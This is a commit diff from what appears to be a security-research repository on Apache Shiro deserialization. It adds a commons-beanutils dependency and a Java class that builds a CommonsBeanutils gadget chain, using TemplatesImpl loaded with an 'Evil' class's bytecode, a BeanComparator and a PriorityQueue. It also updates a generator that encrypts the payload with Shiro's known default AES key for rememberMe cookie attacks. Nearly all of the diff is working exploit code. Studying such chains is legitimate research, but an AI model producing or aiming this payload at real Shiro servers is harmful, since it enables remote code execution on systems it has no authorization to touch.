CommonsBeanutils

Author: SummerSec

shiro/shiro-deser/pom.xml

@@ -52,11 +52,6 @@
             <version>5.5.7</version>
         </dependency>
 <!--         添加commons-collections依赖作为 payload-->
-<!--        <dependency>-->
-<!--            <groupId>commons-collections</groupId>-->
-<!--            <artifactId>commons-collections</artifactId>-->
-<!--            <version>4.0</version>-->
-<!--        </dependency>-->
         <dependency>
             <groupId>org.apache.commons</groupId>
             <artifactId>commons-collections4</artifactId>
@@ -67,6 +62,13 @@
             <artifactId>javassist</artifactId>
             <version>3.27.0-GA</version>
         </dependency>
+        <!-- https://mvnrepository.com/artifact/commons-beanutils/commons-beanutils -->
+        <dependency>
+            <groupId>commons-beanutils</groupId>
+            <artifactId>commons-beanutils</artifactId>
+            <version>1.9.2</version>
+        </dependency>
+
     </dependencies>
 
     <build>

shiro/shiro-deser/src/main/java/summersec/shirodemo/Payload/CommonsBeanutils.java

@@ -0,0 +1,57 @@
+package summersec.shirodemo.Payload;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import javassist.ClassPool;
+import org.apache.commons.beanutils.BeanComparator;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+import java.math.BigInteger;
+import java.util.PriorityQueue;
+
+/**
+ * @ClassName: CommonsBeanutils
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/5/23 10:36
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class CommonsBeanutils {
+    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
+        Field field = obj.getClass().getDeclaredField(fieldName);
+        field.setAccessible(true);
+        field.set(obj, value);
+    }
+
+    public static void main(String[] args) throws Exception {
+        TemplatesImpl obj = new TemplatesImpl();
+        setFieldValue(obj, "_bytecodes", new byte[][]{
+                ClassPool.getDefault().get(Evil.class.getName()).toBytecode()
+        });
+        setFieldValue(obj, "_name", "HelloTemplatesImpl");
+        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
+
+        final BeanComparator comparator = new BeanComparator();
+        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
+        // stub data for replacement later
+        queue.add(1);
+        queue.add(1);
+
+        setFieldValue(comparator, "property", "outputProperties");
+        setFieldValue(queue, "queue", new Object[]{obj, obj});
+
+        ByteArrayOutputStream barr = new ByteArrayOutputStream();
+        ObjectOutputStream oos = new ObjectOutputStream(barr);
+        oos.writeObject(queue);
+        oos.close();
+
+        System.out.println(barr);
+        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
+        Object o = (Object)ois.readObject();
+    }
+}

shiro/shiro-deser/src/main/java/summersec/shirodemo/Payload/CommonsBeanutils1Shiro.java

@@ -57,11 +57,11 @@ public byte[] getPayload(byte[] clazzBytes) throws Exception {
     }
 
     public static void main(String[] args) throws Exception {
-//        ClassPool pool = ClassPool.getDefault();
-//        CtClass clazz = pool.get(Evil.class.getName());
-        byte[] bytes = Evil.class.getName().getBytes();
-        byte[] payloads = new CommonsBeanutils1Shiro().getPayload(bytes);
-//        byte[] payloads = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode());
+        ClassPool pool = ClassPool.getDefault();
+        CtClass clazz = pool.get(Evil.class.getName());
+//        byte[] bytes = Evil.class.getName().getBytes();
+//        byte[] payloads = new CommonsBeanutils1Shiro().getPayload(bytes);
+        byte[] payloads = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode());
 
         AesCipherService aes = new AesCipherService();
         byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");